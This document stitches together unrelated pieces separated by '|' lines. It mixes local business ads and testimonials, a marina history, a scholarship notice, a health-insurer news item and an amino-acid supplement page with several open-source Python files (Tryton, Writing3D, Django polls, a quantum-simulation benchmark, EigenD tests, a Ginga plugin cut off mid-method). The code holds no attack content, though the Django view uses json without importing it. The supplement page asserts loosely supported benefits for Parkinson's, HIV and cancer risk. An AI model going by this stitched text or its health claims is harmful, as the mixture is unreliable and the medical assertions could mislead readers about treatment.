At Air Cooler Guys, we will be available to meet all of your goals when it comes to Air Coolers in Thiensville, WI. Our company has a staff of experienced contractors and the most advanced technology around to supply everything that you need. We make certain that you receive the most effective support, the right price tag, and the highest quality materials. Call us at 888-270-6611 and we'll be glad to talk about the choices, address the questions you have, and set up a consultation to start scheduling your task.
You have a price range to comply with, and you need to cut costs. On the other hand, you want the very best and highest quality of services regarding Air Coolers in Thiensville, WI. We offer the best quality while still costing you less. Our aspiration is to make sure that you enjoy the finest materials and a finished project which will last through the years. We will accomplish this by providing you with the best deals in the field and eliminating expensive complications. Save your time and funds by simply getting in touch with Air Cooler Guys now. We are waiting to answer your phone call at 888-270-6611.
To make the ideal decisions concerning Air Coolers in Thiensville, WI, you should be knowledgeable. We will never let you make unwise decisions, since we know what we'll be working at, and we make sure you know what to expect from the work. We will take the unexpected surprises out from the scenario by supplying precise and complete advice. Step one will be to call us today by dialing 888-270-6611 to set up your project. We will reply to your important questions and set up your initial appointment. Our team can arrive at the appointed time with the appropriate equipment, and will work with you through the entire job.
You've got many good reasons to consider Air Cooler Guys to suit your needs involving Air Coolers in Thiensville, WI. We have got the best customer care scores, the very best quality resources, and the most useful and productive money saving techniques. We have got the experience you will want to satisfy all of your objectives. Contact 888-270-6611 when you need Air Coolers in Thiensville, and we're going to work together with you to systematically complete your task.
|
# -*- coding: utf-8 -*-
"""
stock_lot_serial.stock
Shipment
:copyright: (c) 2013-2014 by Openlabs Technologies & Consulting (P) Limited
:license: 3-clause BSD, see LICENSE for more details.
"""
from trytond.model import ModelView
from trytond.pool import PoolMeta, Pool
from trytond.pyson import Eval
__metaclass__ = PoolMeta
__all__ = ['ShipmentIn']
class ShipmentIn:
"ShipmentIn"
__name__ = "stock.shipment.in"
@classmethod
def __setup__(cls):
super(ShipmentIn, cls).__setup__()
cls._buttons.update({
'split_moves': {
'invisible': Eval('state') != 'draft',
},
})
def _split_moves(self):
"Split incoming moves with quantity greater than 1"
Move = Pool().get('stock.move')
for move in self.incoming_moves:
if not move.product.serialized_inventory_control:
continue
while move.quantity > 1:
Move.copy([move], {'quantity': 1, 'lot': None})
move.quantity -= 1
move.save()
@classmethod
@ModelView.button
def split_moves(cls, shipments):
"Split incoming moves with quantity greater than 1"
for shipment in shipments:
shipment._split_moves()
class Move:
"Move"
__name__ = "stock.move"
@classmethod
def __setup__(cls):
super(Move, cls).__setup__()
cls._error_messages.update({
'quantity_one': "Quantity for moves with products having serialized"
" inventory control cannot be greater than 1."
})
def check_product_serial(self):
"""
Ensure that products with serialized inventory control have only 1 as
quantity for stock moves.
"""
if self.state == 'done' and \
self.product.template.serialized_inventory_control and \
self.quantity != 1.0:
self.raise_user_error('quantity_one')
@classmethod
def validate(cls, moves):
"""
Check if quantity is one when serialized inventory control is true for
each incoming move
"""
super(Move, cls).validate(moves)
for move in moves:
move.check_product_serial()
|
Come join in the fun and watch us grow!
In June of 1958, the Tennessee Valley Authority (TVA) transferred this beautiful 31-acre lakefront site to the Town of Spring City for the enjoyment of the recreating public on Watts Bar Lake in Rhea County, Tennessee. As with many other similar public land transfers by TVA in the 1940’s and 1950’s, these land parcels were to provide lake access and promote recreation and tourism for local communities across the Tennessee Valley Authority’s seven-state region.
Over the years it became obvious that the local governments would need to lease these lakefront properties to commercial operators to facilitate improvements for the recreating public. For nearly 50 years, the Spring City Boat Dock has provided a rich history of lake-oriented recreation. Hundreds of families from across the East Tennessee region have enriched their children’s and grandchildren’s lives through long summer days of boating, fishing, swimming and picnicking on this beautiful, protected cove just 3 miles from downtown Spring City.
In 2005, the Spring City Development, LLC (SCD) partnership was formed to purchase the assets from the existing operators and accept the leasehold interest from the Town of Spring City. The SCD partners and the Town of Spring City have formalized the continued free access and use of the TWRA boat launching area and fishing pier. To continue the rich heritage of public and commercial use at Spring City Dock, SCD is committed to working with our city, county and other partners to make substantial improvements to the docking, dinning, lodging and other potential amenities. We will be hosting and sponsoring many upcoming events to enrich the year round fun that this resort and marina complex can provide for our friends, neighbors and visitors.
Fishing on your mind? For exciting Catfish, Striper and Hybrid Fishing on the beautiful Watts Bar Lake, we recommend AJ's Guide Service! Aaron Jenkins has over seventeen years of Catfish and Striper fishing experience and has learned from the best, such as Gary Roberts and Tom Evans. He lives to fish and devotes countless hours on the water to make sure that he is the best guide and fisherman he can be. When you fish with Captain AJ, he will give 110% to not only make sure you catch fish, but to make your trip one of the most enjoyable fishing experiences of your life.
Hunters! You need to check out Buck Hunters Hunting Club. They have 4-wheeling and outings along with hunting on very large acreage a few miles from our marina.
|
# Copyright (C) 2016 William Hicks
#
# This file is part of Writing3D.
#
# Writing3D is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
"""Tools for working with timelines in W3D projects
"""
import logging
LOGGER = logging.getLogger("pyw3d")
import xml.etree.ElementTree as ET
from .features import W3DFeature
from .actions import W3DAction
from .validators import ListValidator, IsNumeric, IsBoolean, ValidPyString, \
FeatureValidator
from .errors import ConsistencyError, BadW3DXML
from .xml_tools import bool2text, text2bool
from .activators import BlenderTimeline
from .errors import EBKAC
from .structs import SortedList
class W3DTimeline(W3DFeature):
"""Represent timeline for choreography of actions in the W3D
:param str name: Name of timeline
:param bool start_immediately: Start timeline when project starts?
:param list actions: A list of two-element tuples specifying (start time
for action, W3DAction)
"""
argument_validators = {
"name": ValidPyString(),
"start_immediately": IsBoolean(),
"actions": ListValidator(
ListValidator(
[IsNumeric(min_value=0), FeatureValidator(W3DAction)],
item_label="Start Time(s), Action",
required_length=2,
help_string="Start time in seconds, action to perform"
),
help_string="A list of (float, W3DAction) tuples")
}
default_arguments = {
"start_immediately": True
}
def __init__(self, *args, **kwargs):
super(W3DTimeline, self).__init__(*args, **kwargs)
if "actions" not in self:
self["actions"] = SortedList()
else:
self["actions"] = SortedList(self["actions"])
def toXML(self, all_timelines_root):
"""Store W3DTimeline as Timeline node within TimelineRoot node
"""
try:
timeline_attribs = {"name": self["name"]}
except KeyError:
raise ConsistencyError("W3DTimeline must specify a name")
if "start_immediately" in self:
timeline_attribs["start-immediately"] = bool2text(
self["start_immediately"])
timeline_root = ET.SubElement(
all_timelines_root, "Timeline", attrib=timeline_attribs)
for time, action in self["actions"]:
action_root = ET.SubElement(
timeline_root, "TimedActions",
attrib={"seconds-time": str(time)}
)
action.toXML(action_root)
return timeline_root
@classmethod
def fromXML(timeline_class, timeline_root):
"""Create W3DTimeline from Timeline node of W3D XML
:param :py:class:xml.etree.ElementTree.Element timeline_root
"""
new_timeline = timeline_class()
try:
new_timeline["name"] = timeline_root.attrib["name"]
except KeyError:
raise BadW3DXML(
"Timeline node must specify name attribute")
if "start-immediately" in timeline_root.attrib:
new_timeline["start_immediately"] = text2bool(timeline_root.attrib[
"start-immediately"])
for timed_action in timeline_root.findall("TimedActions"):
try:
action_time = float(timed_action.attrib["seconds-time"])
except (KeyError, ValueError):
raise BadW3DXML(
"TimedActions node must specify numeric seconds-time "
"attribute")
for child in timed_action.getchildren():
new_timeline["actions"].add(
(action_time, W3DAction.fromXML(child)))
return new_timeline
def blend(self):
"""Create Blender object to implement W3DTimeline"""
self.activator = BlenderTimeline(
self["name"], self["actions"],
start_immediately=self["start_immediately"])
LOGGER.debug("Creating timeline {}".format(self["name"]))
self.activator.create_blender_objects()
return self.activator.base_object
def link_blender_logic(self):
"""Link BGE logic bricks for this W3DTimeline"""
try:
self.activator.link_logic_bricks()
except AttributeError:
raise EBKAC(
"blend() must be called before link_blender_logic()")
def write_blender_logic(self):
"""Write any necessary game engine logic for this W3DTimeline"""
LOGGER.debug(
"Writing game logic for {}".format(self["name"])
)
try:
self.activator.write_python_logic()
except AttributeError:
raise EBKAC(
"blend() must be called before write_blender_logic()")
|
In February 2016, Launch Manistee announced plans for a Manistee Commitment Scholarship Program. The program was put together due to the generosity of Manistee residents Bill and Marty Paine, who are financially supporting it and through the coordination of Launch Manistee. It is also a joint effort of West Shore Community College, Manistee County Community Foundation (MCCF) and six local school districts: Manistee, Manistee Catholic, Bear Lake, Onekama, CASMAN and Kaleva Norman Dickson (Brethren).
The program promises a college education to select Manistee County ninth graders who show academic promise and have financial need. In addition to receiving a tuition scholarship to West Shore Community College for up to three years and 60 credit hours, selected students and their families will benefit from complimentary programs that provide academic, social, and financial support.
Now heading into our third year, we have three cohorts and a total of 84 students who were nominated by their respective schools.
Save the Date: Our third Manistee Commitment Scholarship Program Induction Ceremony will be held on Wednesday, September 26, 2018 at West Shore Community College at 6:00 p.m. for our third cohort of students.
If you are interested in public events related to the Manistee Commitment Scholarship Program, please join the Launch Manistee Facebook page and watch for photos, updates and event notices.
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from polls.models import Poll
import re
# Create your views here.
def index(request):
return render(request, 'polls/index.html')
def top_commenters(request):
"""just returns contents of top_commenters.json"""
with open('polls/top_commenters.json', 'r') as f:
data = f.read()
return HttpResponse(data, content_type="application/json")
def poll_results_json(request, poll_thread_id):
poll = get_object_or_404(Poll, thread_id=poll_thread_id)
if poll.is_active:
data = poll.json_results
else:
data = json.dumps(poll.status.name)
return HttpResponse(data, content_type="application/json")
def poongko_sort(x):
if x == 'Poongko':
return 0
else:
return x.lower()
def poll_detail(request, slug):
poll = get_object_or_404(Poll, slug=slug)
choices = poll.choice_set.all()
#hacky fix to change order for now
choices = sorted(choices, key=lambda x: poongko_sort(x.name))
poll_title = re.sub(r'<.*?>', '', poll.name)
data = {'poll': poll, 'choices': choices, 'poll_title': poll_title}
return render(request, 'polls/poll_detail.html', data)
|
Get the most from your space with our bathroom design service and trust our experienced tradesmen.
A full range of kitchen appliances are also available from leading brands at very competitive prices.
A Wetroom creates a contemporary look which can transform your bathroom into a stylish, luxurious space.
Bikini Bathrooms offers a cost effective solution to help resolve such problems on behalf of installers or customers, preferably both.
Bikini Bathrooms were brilliant all the way through the journey of deciding what to have in our new shower room. Endless patience, and helpful advice....it made something I had dreaded, into a very positive experience. Special thanks to Gavin and Anne, and to Andy Earney for his great workmanship, fun and tidiness!!! I would recommend your service to anyone. Many thanks!
Had my master bathroom completely redesigned and furnished by Bikini bathrooms. I am over the moon. Anne and her staff were so helpful in helping me pick fixtures and fittings. Andy F the fitter was perfect. He explained how we could redesign our bathroom around to maximise space. Nothing was too much trouble. His workmanship is the best I have seen. Not one fault. Impeccably neat and tidy. I am so impressed that now I am having my ensuite and cloakroom done. Highly recommend to everyone. Thank you Bikini Bathrooms.
15 yr old en-suite refurbished Aug 2017 Everyone I dealt with at Bikini Bathrooms was professional, friendly and helpful. Ann's knowledge of which colours of tiles and furniture complimented each other was really helpful, it all looks fabulous! The fitting by Andy of A & E Installations was first class, all of his recommendations on the best use of the space were spot on. Everyone turned up when they were supposed to and all was left tidy at the end of each day.
Dear Sirs, You installed a new bathroom for us last week. The result is perfect, the materials and installation are first class. A special mention to Andy Fritchley who carried out the fitting ideally. With our best wishes.
We are a family run business who have been involved in designing and installing kitchens and bathrooms for almost 30 years.
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 5 21:44:22 2012
@author: cryan
"""
import numpy as np
from numpy import sin, cos
from scipy.constants import pi
from scipy.linalg import expm, eigh
from PySim.SystemParams import SystemParams
from PySim.PulseSequence import PulseSequence
from PySim.Simulation import simulate_sequence_stack, simulate_sequence
from PySim.QuantumSystems import SCQubit, Hamiltonian, Dissipator
from numba import *
#import matplotlib.pyplot as plt
#from timeit import timeit
#Try to load the CPPBackEnd
try:
import PySim.CySim
CPPBackEnd = True
except ImportError:
CPPBackEnd = False
#@jit(c16[:,:](c16[:,:], c16))
def expm_eigen(matIn, mult):
'''
Helper function to compute matrix exponential of Hermitian matrix
'''
dim = matIn.shape[0]
D, V = eigh(matIn)
return V.dot(np.diag(np.exp(mult*D))).dot(V.conj().T)
@autojit()
def mult_a_X(alpha, X):
outArray = np.zeros_like(X)
for rowct in range(X.shape[0]):
for colct in range(X.shape[1]):
outArray[rowct,colct] = alpha*X[rowct, colct]
return outArray
@jit(c16[:,:](c16[:,:], c16[:,:,:], f8[:,:], f8[:]))
#@autojit
def evolution_numba(Hnat, controlHams, controlFields, controlFreqs):
timeStep = 0.01
curTime = 0.0
Uprop = np.eye(Hnat.shape[0])
for timect in range(controlFields.shape[1]):
tmpH = np.copy(Hnat)
for controlct in range(controlFields.shape[0]):
tmpMult = controlFields[controlct, timect]*cos(2*pi*curTime*controlFreqs[controlct])
for rowct in range(tmpH.shape[0]):
for colct in range(tmpH.shape[1]):
tmpH[rowct,colct] += tmpMult*controlHams[controlct, rowct, colct]
Uprop = np.dot(expm_eigen(tmpH,-1j*2*pi*timeStep)[0],Uprop)
curTime += timeStep
return Uprop
def evolution_numpy(Hnat, controlHams, controlFields, controlFreqs):
timeStep = 0.01
curTime = 0.0
Uprop = np.eye(Hnat.shape[0])
for timect in range(controlFields.shape[1]):
tmpH = np.copy(Hnat)
for controlct in range(controlFields.shape[0]):
tmpH += controlFields[controlct, timect]*cos(2*pi*curTime*controlFreqs[controlct])*controlHams[controlct]
Uprop = np.dot(expm_eigen(tmpH,-1j*2*pi*timeStep)[0],Uprop)
curTime += timeStep
return Uprop
def sim_setup(dimension, numTimeSteps, numControls):
#Create a random natural hamiltonian
tmpMat = np.random.randn(dimension, dimension) + 1j*np.random.randn(dimension, dimension)
Hnat = tmpMat+tmpMat.conj().T
#Create random control Hamiltonians
controlHams = np.zeros((numControls,dimension, dimension), dtype=np.complex128)
for ct in range(numControls):
tmpMat = np.random.randn(dimension, dimension) + 1j*np.random.randn(dimension, dimension)
controlHams[ct] = tmpMat+tmpMat.conj().T
#Create random controlfields
controlFields = np.random.randn(numControls, numTimeSteps)
#Control frequencies
controlFreqs = np.random.randn(numControls)
return Hnat, controlHams, controlFields, controlFreqs
def sim_setup_cython(Hnat, controlHams, controlFields, controlFreqs):
systemParams = SystemParams()
systemParams.Hnat = Hamiltonian(Hnat)
pulseSeq = PulseSequence()
pulseSeq.controlAmps = controlFields
for ct in range(len(controlHams)):
systemParams.add_control_ham(inphase=Hamiltonian(controlHams[ct]))
pulseSeq.add_control_line(freq = controlFreqs[ct], phase=0, controlType='sinusoidal')
for ct in range(np.int(np.log2(Hnat.shape[0]))):
systemParams.add_sub_system(SCQubit(2,0e9, name='Q1', T1=1e-6))
pulseSeq.timeSteps = 0.01*np.ones(controlFields.shape[1])
pulseSeq.maxTimeStep = 1e6
return systemParams, pulseSeq
if __name__ == '__main__':
dims = 2**np.arange(1,6)
dim = 16
Hnat, controlHams, controlFields, controlFreqs = sim_setup(dim, 1000, 4)
print(evolution_numba(Hnat, controlHams, controlFields, controlFreqs))
# systemParams, pulseSeq = sim_setup_cython(Hnat, controlHams, controlFields, controlFreqs)
# cythonTimes = []
# numpyTimes = []
# for dim in dims:
# print(dim)
# Hnat, controlHams, controlFields, controlFreqs = sim_setup(dim, 2000, 4)
# systemParams, pulseSeq = sim_setup_cython(Hnat, controlHams, controlFields, controlFreqs)
# numpyTimes.append(timeit('evolution_numpy(Hnat, controlHams, controlFields, controlFreqs)',
# setup='from __main__ import evolution_numpy, Hnat, controlHams, controlFields, controlFreqs', number=3)/3)
# cythonTimes.append(timeit('simulate_sequence(pulseSeq, systemParams)', setup='from __main__ import simulate_sequence, pulseSeq, systemParams', number=3)/3)
#
# plt.plot(dims, numpyTimes)
# plt.plot(dims, cythonTimes)
# plt.legend(('Numpy', 'Cython'))
# plt.xlabel('System Dimension')
# plt.show()
|
Essential amino acid for hepatic, urinary and cardiovascular protection.
It is an essential amino acid because it can not be produced in the body and thus it can only be obtained exclusively by external intake.
This amino acid is a precursor to the amino acids cysteine and cystine. It was first isolated by John Howard Mueller in 1921.
Hepatic protection: it reduces the accumulation of heavy metals; it lowers cholesterol and triglycerides levels; alongside choline and inositol, this essential amino acid reduces the accumulation and fat deposits in the liver due to the lipotropic effect; it converts estradiol into the nontoxic form called estriol (it protects the liver during the estrogen metabolism).
Improving energy metabolism of the muscle cell that stimulates the production of creatine.
Digestive problems account for nearly 10 percent of all healthcare spending and a least 70 million Americans suffer from some sort of digestive illness. this amino acid is important in gut health.
From 2013- 2015, an estimated 54.4 million people in the United States have suffered from some form of arthritis. Consuming supplement with this amino acid improves the structure and mobility of joints.
This amino acid provides the body sulfur and other substances necessary for a proper development. Sulfur is a very important element, whose lack leads to the body’s inability to produce certain antioxidants.
It is vital for the transportation and absorption of zinc and selenium in the body. These two essential minerals act just line an antioxidant within the body, slowing the aging process and fighting free-radical damage.
Cardiovascular disease accounts for nearly 801,000 deaths every year in the United States. That’s about 1 of every 3 deaths. This amino acid provides cardiovascular protection by reducing fat levels in the bloodstream and atheroma plaque formation.
Higher levels of this amino acid in the daily diet is strongly connected with a lowering in pancreatic cancer risk.
Urinary tract protection: it prevents adherence of bacteria to the bladder wall and their proliferation; it reduces the occurrence and formation of kidney stones.
As many as 1 million people in the United States live with Parkinson’s disease, that is more than the combined number of patients diagnosed with muscular dystrophy, multiple sclerosis, and Lou Gehrig’s disease. According to research, consuming foods high in this amino acid helps in treating and reducing the symptoms of Parkinson’s disease.
Maintaining the structure of hair, skin, and nails: it stimulates collagen production.
In 2015, 39,513 individuals were diagnosed with HIV infection in the US. This amino acid may help in HIV/AIDS treatments.
Some individuals with a deficiency in this amino acid may experience the following symptoms – problems with skin integrity, coordination and muscle strength, and detoxification of the liver.
An adult should intake approximately 19 mg of this amino acid/ kilo of body weight every day.
However, special circumstances and conditions may lead to a much higher requirement.
Large amounts of this amino acid can be found in: eggs, sesame, meat, wheat, wheat bran, oats, oat bran, millet, hazelnuts, pecans, peanuts, almonds, pumpkin seeds, chia seeds, sesame seeds, flax seeds, pine seeds, watermelon seeds, sunflower seeds vegetables, fruits (apples, mangoes, papayas, pineapples) and legumes (peas, red kidney beans, navy beans, adzuki beans, mung beans, lentils, soybeans, chickpeas).
High consumption of this amino acid is not recommended due to its serious side effects. There are not sufficient studies regarding the using of these type of supplements if you are pregnant or breastfeeding, therefore, it is recommended to avoid them. In addition, if you have severe liver disease, do not ingest supplements containing this amino acid.
Therefore, try not to consume supplements containing this amino acid and to obtain it only from food.
|
#!/usr/bin/env python
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, see <http://www.gnu.org/licenses/>.
#
import unittest
from pi import database,logic
class PartofTest(unittest.TestCase):
def test1(self):
c = database.RelationCache()
self.failIf(c.relation(1,2))
self.failIf(c.direct_relation(1,2))
c.assert_relation(database.Relation('x',1,2))
self.failUnless(c.relation(1,2))
self.failUnless(c.direct_relation(1,2))
c.assert_relation(database.Relation('x',1,2))
self.failUnless(c.relation(1,2))
self.failUnless(c.direct_relation(1,2))
c.retract_relation(database.Relation('x',1,2))
self.failUnless(c.relation(1,2))
self.failUnless(c.direct_relation(1,2))
c.retract_relation(database.Relation('x',1,2))
self.failIf(c.relation(1,2))
self.failIf(c.direct_relation(1,2))
def test2(self):
c = database.RelationCache()
c.assert_relation(database.Relation('x',1,2))
c.assert_relation(database.Relation('x',3,4))
self.failUnless(c.relation(1,2))
self.failUnless(c.relation(3,4))
self.failUnless(c.direct_relation(1,2))
self.failUnless(c.direct_relation(3,4))
self.failIf(c.relation(2,3))
self.failIf(c.relation(1,3))
self.failIf(c.relation(1,4))
self.failIf(c.direct_relation(2,3))
self.failIf(c.direct_relation(1,3))
self.failIf(c.direct_relation(1,4))
self.assertEqual(set((2,)),c.direct_rights(1))
self.assertEqual(set(),c.direct_rights(2))
self.assertEqual(set((4,)),c.direct_rights(3))
self.assertEqual(set(),c.direct_rights(4))
self.assertEqual(set(),c.direct_lefts(1))
self.assertEqual(set((1,)),c.direct_lefts(2))
self.assertEqual(set(),c.direct_lefts(3))
self.assertEqual(set((3,)),c.direct_lefts(4))
self.assertEqual(set((2,)),c.rights(1))
self.assertEqual(set(),c.rights(2))
self.assertEqual(set((4,)),c.rights(3))
self.assertEqual(set(),c.rights(4))
self.assertEqual(set(),c.lefts(1))
self.assertEqual(set((1,)),c.lefts(2))
self.assertEqual(set(),c.lefts(3))
self.assertEqual(set((3,)),c.lefts(4))
c.assert_relation(database.Relation('x',2,3))
self.assertEqual(set((2,3,4)),c.rights(1))
self.assertEqual(set((3,4)),c.rights(2))
self.assertEqual(set((4,)),c.rights(3))
self.assertEqual(set(),c.rights(4))
self.assertEqual(set(),c.lefts(1))
self.assertEqual(set((1,)),c.lefts(2))
self.assertEqual(set((1,2)),c.lefts(3))
self.assertEqual(set((1,2,3)),c.lefts(4))
self.assertEqual(set((2,)),c.direct_rights(1))
self.assertEqual(set((3,)),c.direct_rights(2))
self.assertEqual(set((4,)),c.direct_rights(3))
self.assertEqual(set(),c.direct_rights(4))
self.assertEqual(set(),c.direct_lefts(1))
self.assertEqual(set((1,)),c.direct_lefts(2))
self.assertEqual(set((2,)),c.direct_lefts(3))
self.assertEqual(set((3,)),c.direct_lefts(4))
c.retract_relation(database.Relation('x',2,3))
self.assertEqual(set((2,)),c.direct_rights(1))
self.assertEqual(set(),c.direct_rights(2))
self.assertEqual(set((4,)),c.direct_rights(3))
self.assertEqual(set(),c.direct_rights(4))
self.assertEqual(set(),c.direct_lefts(1))
self.assertEqual(set((1,)),c.direct_lefts(2))
self.assertEqual(set(),c.direct_lefts(3))
self.assertEqual(set((3,)),c.direct_lefts(4))
self.assertEqual(set((2,)),c.rights(1))
self.assertEqual(set(),c.rights(2))
self.assertEqual(set((4,)),c.rights(3))
self.assertEqual(set(),c.rights(4))
self.assertEqual(set(),c.lefts(1))
self.assertEqual(set((1,)),c.lefts(2))
self.assertEqual(set(),c.lefts(3))
self.assertEqual(set((3,)),c.lefts(4))
class CircleTest(logic.Fixture):
def __init__(self,*a,**k):
logic.Fixture.__init__(self,database.Database(),*a,**k)
def setUp(self):
r = (database.Relation('partof','wheel','car'),
database.Relation('partof','hub','wheel'),
database.Relation('partof','car','hub'))
self.engine.assert_rules(r)
def test1(self):
self.checkVar('@partof(O,car)','O','wheel','hub','car')
self.checkVar('@partof(O,hub)','O','wheel','hub','car')
self.checkTrue('@partof(hub,car)')
self.checkTrue('@partof(car,hub)')
self.checkTrue('@partof(hub,hub)')
self.checkTrue('@partof(car,car)')
def test1d(self):
self.checkVar('@partof_direct(O,car)','O','wheel')
self.checkFalse('@partof_direct(hub,car)')
self.checkTrue('@partof_direct(wheel,car)')
def test1e(self):
self.checkVar('@partof_extended(O,car)','O','wheel','hub','car')
self.checkTrue('@partof_extended(hub,car)')
self.checkTrue('@partof_extended(car,car)')
self.checkTrue('@partof_extended(wheel,car)')
self.checkTrue('@partof_extended(wheel,wheel)')
self.checkTrue('@partof_extended(car,wheel)')
class RulesTest(logic.Fixture):
def __init__(self,*a,**k):
logic.Fixture.__init__(self,database.Database(),*a,**k)
def setUp(self):
r = (database.Relation('partof','wheel','car'),
database.Relation('partof','hub','wheel'),
database.Relation('partof','tyre','wheel'))
self.engine.assert_rules(r)
def test1(self):
self.checkTrue('@partof(wheel,car)')
self.checkTrue('@partof(hub,car)')
self.checkTrue('@partof(tyre,car)')
self.checkTrue('@partof(hub,wheel)')
self.checkTrue('@partof(tyre,wheel)')
self.checkFalse('@partof(car,wheel)')
self.checkFalse('@partof(car,hub)')
self.checkFalse('@partof(car,tyre)')
self.checkFalse('@partof(wheel,hub)')
self.checkFalse('@partof(wheel,tyre)')
self.checkFalse('@partof(car,car)')
self.checkFalse('@partof(wheel,wheel)')
def test1e(self):
self.checkTrue('@partof_extended(wheel,car)')
self.checkTrue('@partof_extended(hub,car)')
self.checkTrue('@partof_extended(tyre,car)')
self.checkTrue('@partof_extended(hub,wheel)')
self.checkTrue('@partof_extended(tyre,wheel)')
self.checkFalse('@partof_extended(car,wheel)')
self.checkFalse('@partof_extended(car,hub)')
self.checkFalse('@partof_extended(car,tyre)')
self.checkFalse('@partof_extended(wheel,hub)')
self.checkFalse('@partof_extended(wheel,tyre)')
self.checkTrue('@partof_extended(car,car)')
self.checkTrue('@partof_extended(wheel,wheel)')
def test1d(self):
self.checkTrue('@partof_direct(wheel,car)')
self.checkFalse('@partof_direct(hub,car)')
self.checkFalse('@partof_direct(tyre,car)')
self.checkTrue('@partof_direct(hub,wheel)')
self.checkTrue('@partof_direct(tyre,wheel)')
self.checkFalse('@partof_direct(car,wheel)')
self.checkFalse('@partof_direct(car,hub)')
self.checkFalse('@partof_direct(car,tyre)')
self.checkFalse('@partof_direct(wheel,hub)')
self.checkFalse('@partof_direct(wheel,tyre)')
self.checkFalse('@partof_direct(car,car)')
self.checkFalse('@partof_direct(wheel,wheel)')
def test2(self):
self.checkVar('@partof(C,car)','C','wheel','tyre','hub')
self.checkVar('@partof(C,wheel)','C','tyre','hub')
self.checkVar('@partof(wheel,C)','C','car')
self.checkVar('@partof(tyre,C)','C','car','wheel')
self.checkVar('@partof(hub,C)','C','car','wheel')
self.checkResults('@partof(O,C)',[])
def test2e(self):
self.checkVar('@partof_extended(C,car)','C','wheel','tyre','hub','car')
self.checkVar('@partof_extended(C,wheel)','C','tyre','hub','wheel')
self.checkTrue('@partof_extended(wheel,wheel)')
self.checkTrue('@partof_extended(wheel,car)')
self.checkVar('@partof_extended(wheel,C)','C','car','wheel')
self.checkVar('@partof_extended(tyre,C)','C','car','wheel','tyre')
self.checkVar('@partof_extended(hub,C)','C','car','wheel','hub')
self.checkResults('@partof_extended(O,C)',[])
def test2d(self):
self.checkVar('@partof_direct(C,car)','C','wheel')
self.checkVar('@partof_direct(C,wheel)','C','tyre','hub')
self.checkVar('@partof_direct(wheel,C)','C','car')
self.checkVar('@partof_direct(tyre,C)','C','wheel')
self.checkVar('@partof_direct(hub,C)','C','wheel')
self.checkResults('@partof_direct(O,C)',[])
if __name__ == '__main__':
unittest.main()
|
Bernard Collins has been re-appointed as chairman of Vhi Healthcare (VHI), Ireland's leading healthcare insurer-provider, for a further five years, with effect from today (September 24), the health ministry announced yesterday. Mr Collins is CEO of Lifemed Consulting and has board-level positions on other companies in Ireland and in the US. He served for 10 years as VP, international operations, at Boston Scientific until 2003.
|
#
# Compose.py -- Compose plugin for Ginga reference viewer
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import os
from ginga.gw import Widgets
from ginga.misc import Bunch
from ginga import RGBImage, LayerImage
from ginga import GingaPlugin
import numpy
try:
from PIL import Image
have_PIL = True
except ImportError:
have_PIL = False
class ComposeImage(RGBImage.RGBImage, LayerImage.LayerImage):
def __init__(self, *args, **kwdargs):
RGBImage.RGBImage.__init__(self, *args, **kwdargs)
LayerImage.LayerImage.__init__(self)
class Compose(GingaPlugin.LocalPlugin):
"""
Usage:
Start the Compose plugin from the Operation menu--the tab should
show up under "Dialogs"
- Press "New Image" to start composing a new RGB image.
- drag your three constituent images that will make up the R, G and B
planes to the main viewer window--drag them in the order R (red),
G (green) and B (blue).
In the plugin, the R, G and B iamges should show up as three slider
controls in the Layers area of the plugin.
You should now have a composite three color image in the Compose preview
window. Most likely the image does not have good cut levels set, so you
may want to set cut levels on the image using any of the usual cut levels
controls.
- Play with the alpha levels of each layer using the sliders in the
Compose plugin, when you release a slider the image should update.
- When you see something you like you can save it to a file using the
"Save As" button.
"""
def __init__(self, fv, fitsimage):
# superclass defines some variables for us, like logger
super(Compose, self).__init__(fv, fitsimage)
self.limage = None
self.count = 0
self.layertag = 'compose-canvas'
self.dc = fv.getDrawClasses()
canvas = self.dc.DrawingCanvas()
canvas.set_callback('drag-drop', self.drop_file_cb)
canvas.setSurface(self.fitsimage)
self.canvas = canvas
self.gui_up = False
def build_gui(self, container):
top = Widgets.VBox()
top.set_border_width(4)
vbox, sw, orientation = Widgets.get_oriented_box(container)
vbox.set_border_width(4)
vbox.set_spacing(2)
self.msgFont = self.fv.getFont("sansFont", 12)
tw = Widgets.TextArea(wrap=True, editable=False)
tw.set_font(self.msgFont)
self.tw = tw
fr = Widgets.Expander("Instructions")
fr.set_widget(tw)
vbox.add_widget(fr, stretch=0)
fr = Widgets.Frame("Compositing")
captions = (("Compose Type:", 'label', "Compose Type", 'combobox'),
("New Image", 'button', "Insert Layer", 'button'),
)
w, b = Widgets.build_info(captions)
self.w.update(b)
fr.set_widget(w)
vbox.add_widget(fr, stretch=0)
combobox = b.compose_type
index = 0
for name in ('Alpha', 'RGB'):
combobox.append_text(name)
index += 1
combobox.set_index(1)
#combobox.add_callback('activated', self.set_combine_cb)
b.new_image.add_callback('activated', lambda w: self.new_cb())
b.new_image.set_tooltip("Start a new composite image")
b.insert_layer.add_callback('activated', lambda w: self.insert_cb())
b.insert_layer.set_tooltip("Insert channel image as layer")
fr = Widgets.Frame("Layers")
self.w.scales = fr
vbox.add_widget(fr, stretch=0)
hbox = Widgets.HBox()
hbox.set_border_width(4)
hbox.set_spacing(4)
btn = Widgets.Button("Save Image As")
btn.add_callback('activated', lambda w: self.save_as_cb())
hbox.add_widget(btn, stretch=0)
self.entry2 = Widgets.TextEntry()
hbox.add_widget(self.entry2, stretch=1)
self.entry2.add_callback('activated', lambda *args: self.save_as_cb())
